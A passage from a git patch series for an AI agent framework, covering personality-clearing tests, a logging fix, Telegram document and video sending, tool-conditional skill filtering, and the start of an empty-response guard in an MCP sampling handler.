     # Config schema version - bump this when adding new required fields
     "_config_version": 5,
diff --git a/tests/test_personality_none.py b/tests/test_personality_none.py
new file mode 100644
index 00000000..ec27838f
--- /dev/null
+++ b/tests/test_personality_none.py
@@ -0,0 +1,212 @@
+"""Tests for /personality none — clearing personality overlay."""
+import pytest
+from unittest.mock import MagicMock, patch, mock_open
+import yaml
+
+
+# ── CLI tests ──────────────────────────────────────────────────────────────
+
+class TestCLIPersonalityNone:
+
+    def _make_cli(self, personalities=None):
+        from cli import HermesCLI
+        cli = HermesCLI.__new__(HermesCLI)
+        cli.personalities = personalities or {
+            "helpful": "You are helpful.",
+            "concise": "You are concise.",
+        }
+        cli.system_prompt = "You are kawaii~"
+        cli.agent = MagicMock()
+        cli.console = MagicMock()
+        return cli
+
+    def test_none_clears_system_prompt(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality none")
+        assert cli.system_prompt == ""
+
+    def test_default_clears_system_prompt(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality default")
+        assert cli.system_prompt == ""
+
+    def test_neutral_clears_system_prompt(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality neutral")
+        assert cli.system_prompt == ""
+
+    def test_none_forces_agent_reinit(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality none")
+        assert cli.agent is None
+
+    def test_none_saves_to_config(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True) as mock_save:
+            cli._handle_personality_command("/personality none")
+        mock_save.assert_called_once_with("agent.system_prompt", "")
+
+    def test_known_personality_still_works(self):
+        cli = self._make_cli()
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality helpful")
+        assert cli.system_prompt == "You are helpful."
+
+    def test_unknown_personality_shows_none_in_available(self, capsys):
+        cli = self._make_cli()
+        cli._handle_personality_command("/personality nonexistent")
+        output = capsys.readouterr().out
+        assert "none" in output.lower()
+
+    def test_list_shows_none_option(self):
+        cli = self._make_cli()
+        with patch("builtins.print") as mock_print:
+            cli._handle_personality_command("/personality")
+        output = " ".join(str(c) for c in mock_print.call_args_list)
+        assert "none" in output.lower()
+
+
+# ── Gateway tests ──────────────────────────────────────────────────────────
+
+class TestGatewayPersonalityNone:
+
+    def _make_event(self, args=""):
+        event = MagicMock()
+        event.get_command.return_value = "personality"
+        event.get_command_args.return_value = args
+        return event
+
+    def _make_runner(self, personalities=None):
+        from gateway.run import GatewayRunner
+        runner = GatewayRunner.__new__(GatewayRunner)
+        runner._ephemeral_system_prompt = "You are kawaii~"
+        runner.config = {
+            "agent": {
+                "personalities": personalities or {"helpful": "You are helpful."}
+            }
+        }
+        return runner
+
+    @pytest.mark.asyncio
+    async def test_none_clears_ephemeral_prompt(self, tmp_path):
+        runner = self._make_runner()
+        config_data = {"agent": {"personalities": {"helpful": "You are helpful."}, "system_prompt": "kawaii"}}
+        config_file = tmp_path / "config.yaml"
+        config_file.write_text(yaml.dump(config_data))
+
+        with patch("gateway.run._hermes_home", tmp_path):
+            event = self._make_event("none")
+            result = await runner._handle_personality_command(event)
+
+        assert runner._ephemeral_system_prompt == ""
+        assert "cleared" in result.lower()
+
+    @pytest.mark.asyncio
+    async def test_default_clears_ephemeral_prompt(self, tmp_path):
+        runner = self._make_runner()
+        config_data = {"agent": {"personalities": {"helpful": "You are helpful."}}}
+        config_file = tmp_path / "config.yaml"
+        config_file.write_text(yaml.dump(config_data))
+
+        with patch("gateway.run._hermes_home", tmp_path):
+            event = self._make_event("default")
+            result = await runner._handle_personality_command(event)
+
+        assert runner._ephemeral_system_prompt == ""
+
+    @pytest.mark.asyncio
+    async def test_list_includes_none(self, tmp_path):
+        runner = self._make_runner()
+        config_data = {"agent": {"personalities": {"helpful": "You are helpful."}}}
+        config_file = tmp_path / "config.yaml"
+        config_file.write_text(yaml.dump(config_data))
+
+        with patch("gateway.run._hermes_home", tmp_path):
+            event = self._make_event("")
+            result = await runner._handle_personality_command(event)
+
+        assert "none" in result.lower()
+
+    @pytest.mark.asyncio
+    async def test_unknown_shows_none_in_available(self, tmp_path):
+        runner = self._make_runner()
+        config_data = {"agent": {"personalities": {"helpful": "You are helpful."}}}
+        config_file = tmp_path / "config.yaml"
+        config_file.write_text(yaml.dump(config_data))
+
+        with patch("gateway.run._hermes_home", tmp_path):
+            event = self._make_event("nonexistent")
+            result = await runner._handle_personality_command(event)
+
+        assert "none" in result.lower()
+
+
+class TestPersonalityDictFormat:
+    """Test dict-format custom personalities with description, tone, style."""
+
+    def _make_cli(self, personalities):
+        from cli import HermesCLI
+        cli = HermesCLI.__new__(HermesCLI)
+        cli.personalities = personalities
+        cli.system_prompt = ""
+        cli.agent = None
+        cli.console = MagicMock()
+        return cli
+
+    def test_dict_personality_uses_system_prompt(self):
+        cli = self._make_cli({
+            "coder": {
+                "description": "Expert programmer",
+                "system_prompt": "You are an expert programmer.",
+                "tone": "technical",
+                "style": "concise",
+            }
+        })
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality coder")
+        assert "You are an expert programmer." in cli.system_prompt
+
+    def test_dict_personality_includes_tone(self):
+        cli = self._make_cli({
+            "coder": {
+                "system_prompt": "You are an expert programmer.",
+                "tone": "technical and precise",
+            }
+        })
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality coder")
+        assert "Tone: technical and precise" in cli.system_prompt
+
+    def test_dict_personality_includes_style(self):
+        cli = self._make_cli({
+            "coder": {
+                "system_prompt": "You are an expert programmer.",
+                "style": "use code examples",
+            }
+        })
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality coder")
+        assert "Style: use code examples" in cli.system_prompt
+
+    def test_string_personality_still_works(self):
+        cli = self._make_cli({"helper": "You are helpful."})
+        with patch("cli.save_config_value", return_value=True):
+            cli._handle_personality_command("/personality helper")
+        assert cli.system_prompt == "You are helpful."
+
+    def test_resolve_prompt_dict_no_tone_no_style(self):
+        from cli import HermesCLI
+        result = HermesCLI._resolve_personality_prompt({
+            "description": "A helper",
+            "system_prompt": "You are helpful.",
+        })
+        assert result == "You are helpful."
+
+    def test_resolve_prompt_string(self):
+        from cli import HermesCLI
+        result = HermesCLI._resolve_personality_prompt("You are helpful.")
+        assert result == "You are helpful."

From b78b605ba9872f5d8a2b977a9e2cb864b9999ad4 Mon Sep 17 00:00:00 2001
From: "memosr.eth" <96793918+memosr@users.noreply.github.com>
Date: Mon, 9 Mar 2026 22:29:16 +0300
Subject: [PATCH 022/105] fix: replace print() with logger.error() in
 file_tools

---
 tools/file_tools.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tools/file_tools.py b/tools/file_tools.py
index b29d2d27..e2533e68 100644
--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -140,7 +140,7 @@ def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
         result = file_ops.write_file(path, content)
         return json.dumps(result.to_dict(), ensure_ascii=False)
     except Exception as e:
-        print(f"[FileTools] write_file error: {type(e).__name__}: {e}", flush=True)  
+        logger.error("write_file error: %s: %s", type(e).__name__, e)
         return json.dumps({"error": str(e)}, ensure_ascii=False)
 
 

From 5eaf4a3f323c184f04e8f552fba1502710715839 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Mon, 9 Mar 2026 12:17:35 -0700
Subject: [PATCH 023/105] feat: Telegram send_document and send_video for
 native file attachments
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Implement send_document() and send_video() overrides in TelegramAdapter
so the agent can deliver files (PDFs, CSVs, docs, etc.) and videos as
native Telegram attachments instead of just printing the file path as
text.

The base adapter already routes MEDIA:<path> tags by extension — audio
goes to send_voice(), images to send_image_file(), and everything else
falls through to send_document(). But TelegramAdapter didn't override
send_document() or send_video(), so those fell back to plain text.

Now when the agent includes MEDIA:/path/to/report.pdf in its response,
users get a proper downloadable file attachment in Telegram.

Features:
- send_document: sends files via bot.send_document with display name,
  caption (truncated to 1024), and reply_to support
- send_video: sends videos via bot.send_video with inline playback
- Both fall back to base class text if the Telegram API call fails
- 10 new tests covering success, custom filename, file-not-found,
  not-connected, caption truncation, API error fallback, and reply_to

Requested by @TigerHixTang on Twitter.
---
 gateway/platforms/telegram.py            |  58 +++++++
 tests/gateway/test_telegram_documents.py | 201 +++++++++++++++++++++++
 2 files changed, 259 insertions(+)

diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index 4371bfdb..77e5c6f6 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -346,6 +346,64 @@ class TelegramAdapter(BasePlatformAdapter):
             print(f"[{self.name}] Failed to send local image: {e}")
             return await super().send_image_file(chat_id, image_path, caption, reply_to)
 
+    async def send_document(
+        self,
+        chat_id: str,
+        file_path: str,
+        caption: Optional[str] = None,
+        file_name: Optional[str] = None,
+        reply_to: Optional[str] = None,
+    ) -> SendResult:
+        """Send a document/file natively as a Telegram file attachment."""
+        if not self._bot:
+            return SendResult(success=False, error="Not connected")
+
+        try:
+            if not os.path.exists(file_path):
+                return SendResult(success=False, error=f"File not found: {file_path}")
+
+            display_name = file_name or os.path.basename(file_path)
+
+            with open(file_path, "rb") as f:
+                msg = await self._bot.send_document(
+                    chat_id=int(chat_id),
+                    document=f,
+                    filename=display_name,
+                    caption=caption[:1024] if caption else None,
+                    reply_to_message_id=int(reply_to) if reply_to else None,
+                )
+            return SendResult(success=True, message_id=str(msg.message_id))
+        except Exception as e:
+            print(f"[{self.name}] Failed to send document: {e}")
+            return await super().send_document(chat_id, file_path, caption, file_name, reply_to)
+
+    async def send_video(
+        self,
+        chat_id: str,
+        video_path: str,
+        caption: Optional[str] = None,
+        reply_to: Optional[str] = None,
+    ) -> SendResult:
+        """Send a video natively as a Telegram video message."""
+        if not self._bot:
+            return SendResult(success=False, error="Not connected")
+
+        try:
+            if not os.path.exists(video_path):
+                return SendResult(success=False, error=f"Video file not found: {video_path}")
+
+            with open(video_path, "rb") as f:
+                msg = await self._bot.send_video(
+                    chat_id=int(chat_id),
+                    video=f,
+                    caption=caption[:1024] if caption else None,
+                    reply_to_message_id=int(reply_to) if reply_to else None,
+                )
+            return SendResult(success=True, message_id=str(msg.message_id))
+        except Exception as e:
+            print(f"[{self.name}] Failed to send video: {e}")
+            return await super().send_video(chat_id, video_path, caption, reply_to)
+
     async def send_image(
         self,
         chat_id: str,
diff --git a/tests/gateway/test_telegram_documents.py b/tests/gateway/test_telegram_documents.py
index 4aceda84..7a76625f 100644
--- a/tests/gateway/test_telegram_documents.py
+++ b/tests/gateway/test_telegram_documents.py
@@ -20,6 +20,7 @@ from gateway.config import Platform, PlatformConfig
 from gateway.platforms.base import (
     MessageEvent,
     MessageType,
+    SendResult,
     SUPPORTED_DOCUMENT_TYPES,
 )
 
@@ -336,3 +337,203 @@ class TestDocumentDownloadBlock:
         await adapter._handle_media_message(update, MagicMock())
         # handle_message should still be called (the handler catches the exception)
         adapter.handle_message.assert_called_once()
+
+
+# ---------------------------------------------------------------------------
+# TestSendDocument — outbound file attachment delivery
+# ---------------------------------------------------------------------------
+
+class TestSendDocument:
+    """Tests for TelegramAdapter.send_document() — sending files to users."""
+
+    @pytest.fixture()
+    def connected_adapter(self, adapter):
+        """Adapter with a mock bot attached."""
+        bot = AsyncMock()
+        adapter._bot = bot
+        return adapter
+
+    @pytest.mark.asyncio
+    async def test_send_document_success(self, connected_adapter, tmp_path):
+        """A local file is sent via bot.send_document and returns success."""
+        # Create a real temp file
+        test_file = tmp_path / "report.pdf"
+        test_file.write_bytes(b"%PDF-1.4 fake content")
+
+        mock_msg = MagicMock()
+        mock_msg.message_id = 99
+        connected_adapter._bot.send_document = AsyncMock(return_value=mock_msg)
+
+        result = await connected_adapter.send_document(
+            chat_id="12345",
+            file_path=str(test_file),
+            caption="Here's the report",
+        )
+
+        assert result.success is True
+        assert result.message_id == "99"
+        connected_adapter._bot.send_document.assert_called_once()
+        call_kwargs = connected_adapter._bot.send_document.call_args[1]
+        assert call_kwargs["chat_id"] == 12345
+        assert call_kwargs["filename"] == "report.pdf"
+        assert call_kwargs["caption"] == "Here's the report"
+
+    @pytest.mark.asyncio
+    async def test_send_document_custom_filename(self, connected_adapter, tmp_path):
+        """The file_name parameter overrides the basename for display."""
+        test_file = tmp_path / "doc_abc123_ugly.csv"
+        test_file.write_bytes(b"a,b,c\n1,2,3")
+
+        mock_msg = MagicMock()
+        mock_msg.message_id = 100
+        connected_adapter._bot.send_document = AsyncMock(return_value=mock_msg)
+
+        result = await connected_adapter.send_document(
+            chat_id="12345",
+            file_path=str(test_file),
+            file_name="clean_data.csv",
+        )
+
+        assert result.success is True
+        call_kwargs = connected_adapter._bot.send_document.call_args[1]
+        assert call_kwargs["filename"] == "clean_data.csv"
+
+    @pytest.mark.asyncio
+    async def test_send_document_file_not_found(self, connected_adapter):
+        """Missing file returns error without calling Telegram API."""
+        result = await connected_adapter.send_document(
+            chat_id="12345",
+            file_path="/nonexistent/file.pdf",
+        )
+
+        assert result.success is False
+        assert "not found" in result.error.lower()
+        connected_adapter._bot.send_document.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_send_document_not_connected(self, adapter):
+        """If bot is None, returns not connected error."""
+        result = await adapter.send_document(
+            chat_id="12345",
+            file_path="/some/file.pdf",
+        )
+
+        assert result.success is False
+        assert "Not connected" in result.error
+
+    @pytest.mark.asyncio
+    async def test_send_document_caption_truncated(self, connected_adapter, tmp_path):
+        """Captions longer than 1024 chars are truncated."""
+        test_file = tmp_path / "data.json"
+        test_file.write_bytes(b"{}")
+
+        mock_msg = MagicMock()
+        mock_msg.message_id = 101
+        connected_adapter._bot.send_document = AsyncMock(return_value=mock_msg)
+
+        long_caption = "x" * 2000
+        await connected_adapter.send_document(
+            chat_id="12345",
+            file_path=str(test_file),
+            caption=long_caption,
+        )
+
+        call_kwargs = connected_adapter._bot.send_document.call_args[1]
+        assert len(call_kwargs["caption"]) == 1024
+
+    @pytest.mark.asyncio
+    async def test_send_document_api_error_falls_back(self, connected_adapter, tmp_path):
+        """If Telegram API raises, falls back to base class text message."""
+        test_file = tmp_path / "file.pdf"
+        test_file.write_bytes(b"data")
+
+        connected_adapter._bot.send_document = AsyncMock(
+            side_effect=RuntimeError("Telegram API error")
+        )
+
+        # The base fallback calls self.send() which is also on _bot, so mock it
+        # to avoid cascading errors.
+        connected_adapter.send = AsyncMock(
+            return_value=SendResult(success=True, message_id="fallback")
+        )
+
+        result = await connected_adapter.send_document(
+            chat_id="12345",
+            file_path=str(test_file),
+        )
+
+        # Should have fallen back to base class
+        assert result.success is True
+        assert result.message_id == "fallback"
+
+    @pytest.mark.asyncio
+    async def test_send_document_reply_to(self, connected_adapter, tmp_path):
+        """reply_to parameter is forwarded as reply_to_message_id."""
+        test_file = tmp_path / "spec.md"
+        test_file.write_bytes(b"# Spec")
+
+        mock_msg = MagicMock()
+        mock_msg.message_id = 102
+        connected_adapter._bot.send_document = AsyncMock(return_value=mock_msg)
+
+        await connected_adapter.send_document(
+            chat_id="12345",
+            file_path=str(test_file),
+            reply_to="50",
+        )
+
+        call_kwargs = connected_adapter._bot.send_document.call_args[1]
+        assert call_kwargs["reply_to_message_id"] == 50
+
+
+# ---------------------------------------------------------------------------
+# TestSendVideo — outbound video delivery
+# ---------------------------------------------------------------------------
+
+class TestSendVideo:
+    """Tests for TelegramAdapter.send_video() — sending videos to users."""
+
+    @pytest.fixture()
+    def connected_adapter(self, adapter):
+        bot = AsyncMock()
+        adapter._bot = bot
+        return adapter
+
+    @pytest.mark.asyncio
+    async def test_send_video_success(self, connected_adapter, tmp_path):
+        test_file = tmp_path / "clip.mp4"
+        test_file.write_bytes(b"\x00\x00\x00\x1c" + b"ftyp" + b"\x00" * 100)
+
+        mock_msg = MagicMock()
+        mock_msg.message_id = 200
+        connected_adapter._bot.send_video = AsyncMock(return_value=mock_msg)
+
+        result = await connected_adapter.send_video(
+            chat_id="12345",
+            video_path=str(test_file),
+            caption="Check this out",
+        )
+
+        assert result.success is True
+        assert result.message_id == "200"
+        connected_adapter._bot.send_video.assert_called_once()
+
+    @pytest.mark.asyncio
+    async def test_send_video_file_not_found(self, connected_adapter):
+        result = await connected_adapter.send_video(
+            chat_id="12345",
+            video_path="/nonexistent/video.mp4",
+        )
+
+        assert result.success is False
+        assert "not found" in result.error.lower()
+
+    @pytest.mark.asyncio
+    async def test_send_video_not_connected(self, adapter):
+        result = await adapter.send_video(
+            chat_id="12345",
+            video_path="/some/video.mp4",
+        )
+
+        assert result.success is False
+        assert "Not connected" in result.error

From 94023e6a85c42e90a3bf8e16a9e74ce6916794f2 Mon Sep 17 00:00:00 2001
From: teyrebaz33 <hakanerten02@hotmail.com>
Date: Mon, 9 Mar 2026 23:13:39 +0300
Subject: [PATCH 024/105] feat: conditional skill activation based on tool
 availability

Skills can now declare fallback_for_toolsets, fallback_for_tools,
requires_toolsets, and requires_tools in their SKILL.md frontmatter.
The system prompt builder filters skills automatically based on which
tools are available in the current session.

- Add _read_skill_conditions() to parse conditional frontmatter fields
- Add _skill_should_show() to evaluate conditions against available tools
- Update build_skills_system_prompt() to accept and apply tool availability
- Pass valid_tool_names and available toolsets from run_agent.py
- Backward compatible: skills without conditions always show; calling
  build_skills_system_prompt() with no args preserves existing behavior

Closes #539
---
 agent/prompt_builder.py            |  57 +++++++++-
 run_agent.py                       |   9 +-
 tests/agent/test_prompt_builder.py | 176 +++++++++++++++++++++++++++++
 3 files changed, 240 insertions(+), 2 deletions(-)

diff --git a/agent/prompt_builder.py b/agent/prompt_builder.py
index 0582d63d..2824faa5 100644
--- a/agent/prompt_builder.py
+++ b/agent/prompt_builder.py
@@ -179,7 +179,58 @@ def _skill_is_platform_compatible(skill_file: Path) -> bool:
         return True  # Err on the side of showing the skill
 
 
-def build_skills_system_prompt() -> str:
+def _read_skill_conditions(skill_file: Path) -> dict:
+    """Extract conditional activation fields from SKILL.md frontmatter."""
+    try:
+        from tools.skills_tool import _parse_frontmatter
+        raw = skill_file.read_text(encoding="utf-8")[:2000]
+        frontmatter, _ = _parse_frontmatter(raw)
+        hermes = frontmatter.get("metadata", {}).get("hermes", {})
+        return {
+            "fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
+            "requires_toolsets": hermes.get("requires_toolsets", []),
+            "fallback_for_tools": hermes.get("fallback_for_tools", []),
+            "requires_tools": hermes.get("requires_tools", []),
+        }
+    except Exception:
+        return {}
+
+
+def _skill_should_show(
+    conditions: dict,
+    available_tools: "set[str] | None",
+    available_toolsets: "set[str] | None",
+) -> bool:
+    """Return False if the skill's conditional activation rules exclude it."""
+    if available_tools is None and available_toolsets is None:
+        return True  # No filtering info — show everything (backward compat)
+
+    at = available_tools or set()
+    ats = available_toolsets or set()
+
+    # fallback_for: hide when the primary tool/toolset IS available
+    for ts in conditions.get("fallback_for_toolsets", []):
+        if ts in ats:
+            return False
+    for t in conditions.get("fallback_for_tools", []):
+        if t in at:
+            return False
+
+    # requires: hide when a required tool/toolset is NOT available
+    for ts in conditions.get("requires_toolsets", []):
+        if ts not in ats:
+            return False
+    for t in conditions.get("requires_tools", []):
+        if t not in at:
+            return False
+
+    return True
+
+
+def build_skills_system_prompt(
+    available_tools: "set[str] | None" = None,
+    available_toolsets: "set[str] | None" = None,
+) -> str:
     """Build a compact skill index for the system prompt.
 
     Scans ~/.hermes/skills/ for SKILL.md files grouped by category.
@@ -202,6 +253,10 @@ def build_skills_system_prompt() -> str:
         # Skip skills incompatible with the current OS platform
         if not _skill_is_platform_compatible(skill_file):
             continue
+        # Skip skills whose conditional activation rules exclude them
+        conditions = _read_skill_conditions(skill_file)
+        if not _skill_should_show(conditions, available_tools, available_toolsets):
+            continue
         rel_path = skill_file.relative_to(skills_dir)
         parts = rel_path.parts
         if len(parts) >= 2:
diff --git a/run_agent.py b/run_agent.py
index c1f2623c..80937b34 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -1410,7 +1410,14 @@ class AIAgent:
                     prompt_parts.append(user_block)
 
         has_skills_tools = any(name in self.valid_tool_names for name in ['skills_list', 'skill_view', 'skill_manage'])
-        skills_prompt = build_skills_system_prompt() if has_skills_tools else ""
+        if has_skills_tools:
+            avail_toolsets = {ts for ts, avail in check_toolset_requirements().items() if avail}
+            skills_prompt = build_skills_system_prompt(
+                available_tools=self.valid_tool_names,
+                available_toolsets=avail_toolsets,
+            )
+        else:
+            skills_prompt = ""
         if skills_prompt:
             prompt_parts.append(skills_prompt)
 
diff --git a/tests/agent/test_prompt_builder.py b/tests/agent/test_prompt_builder.py
index a35983b5..972f3f75 100644
--- a/tests/agent/test_prompt_builder.py
+++ b/tests/agent/test_prompt_builder.py
@@ -8,6 +8,8 @@ from agent.prompt_builder import (
     _scan_context_content,
     _truncate_content,
     _read_skill_description,
+    _read_skill_conditions,
+    _skill_should_show,
     build_skills_system_prompt,
     build_context_files_prompt,
     CONTEXT_FILE_MAX_CHARS,
@@ -277,3 +279,177 @@ class TestPromptBuilderConstants:
         assert "telegram" in PLATFORM_HINTS
         assert "discord" in PLATFORM_HINTS
         assert "cli" in PLATFORM_HINTS
+
+
+# =========================================================================
+# Conditional skill activation
+# =========================================================================
+
+class TestReadSkillConditions:
+    def test_no_conditions_returns_empty_lists(self, tmp_path):
+        skill_file = tmp_path / "SKILL.md"
+        skill_file.write_text("---\nname: test\ndescription: A skill\n---\n")
+        conditions = _read_skill_conditions(skill_file)
+        assert conditions["fallback_for_toolsets"] == []
+        assert conditions["requires_toolsets"] == []
+        assert conditions["fallback_for_tools"] == []
+        assert conditions["requires_tools"] == []
+
+    def test_reads_fallback_for_toolsets(self, tmp_path):
+        skill_file = tmp_path / "SKILL.md"
+        skill_file.write_text(
+            "---\nname: ddg\ndescription: DuckDuckGo\nmetadata:\n  hermes:\n    fallback_for_toolsets: [web]\n---\n"
+        )
+        conditions = _read_skill_conditions(skill_file)
+        assert conditions["fallback_for_toolsets"] == ["web"]
+
+    def test_reads_requires_toolsets(self, tmp_path):
+        skill_file = tmp_path / "SKILL.md"
+        skill_file.write_text(
+            "---\nname: openhue\ndescription: Hue lights\nmetadata:\n  hermes:\n    requires_toolsets: [terminal]\n---\n"
+        )
+        conditions = _read_skill_conditions(skill_file)
+        assert conditions["requires_toolsets"] == ["terminal"]
+
+    def test_reads_multiple_conditions(self, tmp_path):
+        skill_file = tmp_path / "SKILL.md"
+        skill_file.write_text(
+            "---\nname: test\ndescription: Test\nmetadata:\n  hermes:\n    fallback_for_toolsets: [browser]\n    requires_tools: [terminal]\n---\n"
+        )
+        conditions = _read_skill_conditions(skill_file)
+        assert conditions["fallback_for_toolsets"] == ["browser"]
+        assert conditions["requires_tools"] == ["terminal"]
+
+    def test_missing_file_returns_empty(self, tmp_path):
+        conditions = _read_skill_conditions(tmp_path / "missing.md")
+        assert conditions == {}
+
+
+class TestSkillShouldShow:
+    def test_no_filter_info_always_shows(self):
+        assert _skill_should_show({}, None, None) is True
+
+    def test_empty_conditions_always_shows(self):
+        assert _skill_should_show(
+            {"fallback_for_toolsets": [], "requires_toolsets": [],
+             "fallback_for_tools": [], "requires_tools": []},
+            {"web_search"}, {"web"}
+        ) is True
+
+    def test_fallback_hidden_when_toolset_available(self):
+        conditions = {"fallback_for_toolsets": ["web"], "requires_toolsets": [],
+                      "fallback_for_tools": [], "requires_tools": []}
+        assert _skill_should_show(conditions, set(), {"web"}) is False
+
+    def test_fallback_shown_when_toolset_unavailable(self):
+        conditions = {"fallback_for_toolsets": ["web"], "requires_toolsets": [],
+                      "fallback_for_tools": [], "requires_tools": []}
+        assert _skill_should_show(conditions, set(), set()) is True
+
+    def test_requires_shown_when_toolset_available(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": ["terminal"],
+                      "fallback_for_tools": [], "requires_tools": []}
+        assert _skill_should_show(conditions, set(), {"terminal"}) is True
+
+    def test_requires_hidden_when_toolset_missing(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": ["terminal"],
+                      "fallback_for_tools": [], "requires_tools": []}
+        assert _skill_should_show(conditions, set(), set()) is False
+
+    def test_fallback_for_tools_hidden_when_tool_available(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": [],
+                      "fallback_for_tools": ["web_search"], "requires_tools": []}
+        assert _skill_should_show(conditions, {"web_search"}, set()) is False
+
+    def test_fallback_for_tools_shown_when_tool_missing(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": [],
+                      "fallback_for_tools": ["web_search"], "requires_tools": []}
+        assert _skill_should_show(conditions, set(), set()) is True
+
+    def test_requires_tools_hidden_when_tool_missing(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": [],
+                      "fallback_for_tools": [], "requires_tools": ["terminal"]}
+        assert _skill_should_show(conditions, set(), set()) is False
+
+    def test_requires_tools_shown_when_tool_available(self):
+        conditions = {"fallback_for_toolsets": [], "requires_toolsets": [],
+                      "fallback_for_tools": [], "requires_tools": ["terminal"]}
+        assert _skill_should_show(conditions, {"terminal"}, set()) is True
+
+
+class TestBuildSkillsSystemPromptConditional:
+    def test_fallback_skill_hidden_when_primary_available(self, monkeypatch, tmp_path):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "search" / "duckduckgo"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: duckduckgo\ndescription: Free web search\nmetadata:\n  hermes:\n    fallback_for_toolsets: [web]\n---\n"
+        )
+        result = build_skills_system_prompt(
+            available_tools=set(),
+            available_toolsets={"web"},
+        )
+        assert "duckduckgo" not in result
+
+    def test_fallback_skill_shown_when_primary_unavailable(self, monkeypatch, tmp_path):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "search" / "duckduckgo"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: duckduckgo\ndescription: Free web search\nmetadata:\n  hermes:\n    fallback_for_toolsets: [web]\n---\n"
+        )
+        result = build_skills_system_prompt(
+            available_tools=set(),
+            available_toolsets=set(),
+        )
+        assert "duckduckgo" in result
+
+    def test_requires_skill_hidden_when_toolset_missing(self, monkeypatch, tmp_path):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "iot" / "openhue"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: openhue\ndescription: Hue lights\nmetadata:\n  hermes:\n    requires_toolsets: [terminal]\n---\n"
+        )
+        result = build_skills_system_prompt(
+            available_tools=set(),
+            available_toolsets=set(),
+        )
+        assert "openhue" not in result
+
+    def test_requires_skill_shown_when_toolset_available(self, monkeypatch, tmp_path):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "iot" / "openhue"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: openhue\ndescription: Hue lights\nmetadata:\n  hermes:\n    requires_toolsets: [terminal]\n---\n"
+        )
+        result = build_skills_system_prompt(
+            available_tools=set(),
+            available_toolsets={"terminal"},
+        )
+        assert "openhue" in result
+
+    def test_unconditional_skill_always_shown(self, monkeypatch, tmp_path):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "general" / "notes"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: notes\ndescription: Take notes\n---\n"
+        )
+        result = build_skills_system_prompt(
+            available_tools=set(),
+            available_toolsets=set(),
+        )
+        assert "notes" in result
+
+    def test_no_args_shows_all_skills(self, monkeypatch, tmp_path):
+        """Backward compat: calling with no args shows everything."""
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        skill_dir = tmp_path / "skills" / "search" / "duckduckgo"
+        skill_dir.mkdir(parents=True)
+        (skill_dir / "SKILL.md").write_text(
+            "---\nname: duckduckgo\ndescription: Free web search\nmetadata:\n  hermes:\n    fallback_for_toolsets: [web]\n---\n"
+        )
+        result = build_skills_system_prompt()
+        assert "duckduckgo" in result

From 4e3a8a06371fe9edc8f34de6d368183f809ebb2c Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Tue, 10 Mar 2026 02:24:53 +0300
Subject: [PATCH 025/105] fix: handle empty choices in MCP sampling callback

SamplingHandler.__call__ accessed response.choices[0] without checking
if the list was non-empty. LLM APIs can return empty choices on content
filtering, provider errors, or rate limits, causing an unhandled
IndexError that propagates to the MCP SDK and may crash the connection.

Add a defensive guard that returns a proper ErrorData when choices is
empty, None, or missing. Includes three test cases covering all
variants.
---
 tests/tools/test_mcp_tool.py | 59 ++++++++++++++++++++++++++++++++++++
 tools/mcp_tool.py            |  8 +++++
 2 files changed, 67 insertions(+)

diff --git a/tests/tools/test_mcp_tool.py b/tests/tools/test_mcp_tool.py
index 1acbdfa1..446f80d3 100644
--- a/tests/tools/test_mcp_tool.py
+++ b/tests/tools/test_mcp_tool.py
@@ -2049,6 +2049,65 @@ class TestSamplingErrors:
             assert "No LLM provider" in result.message
             assert handler.metrics["errors"] == 1
 
+    def test_empty_choices_returns_error(self):
+        """LLM returning choices=[] is handled gracefully, not IndexError."""
+        handler = SamplingHandler("ec", {})
+        fake_client = MagicMock()
+        fake_client.chat.completions.create.return_value = SimpleNamespace(
+            choices=[],
+            model="test-model",
